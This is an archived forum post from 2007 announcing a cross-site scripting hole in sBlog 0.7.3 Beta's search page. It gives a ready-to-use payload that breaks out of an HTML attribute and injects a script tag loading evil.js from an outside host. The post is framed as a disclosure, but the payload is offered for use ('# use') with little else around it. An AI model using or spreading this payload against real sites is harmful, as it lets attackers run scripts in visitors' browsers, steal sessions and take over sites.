PDA

Bekijk Volledige Versie : sBlog 0.7.3 Beta XSS Vulnerabilitie



Guns@0x90.com.ar
01/08/07, 18:51
# sBlog 0.7.3 Beta XSS Vulnerabilitie
# Found by 0x90
# www.0x90.com.ar
# msn & mail: Guns@0x90.com.ar


# in blog
http://host/blog/search.php

# use

'"/></><script src=http://yoursite.com/evil.js>

# Welcome to the jungle!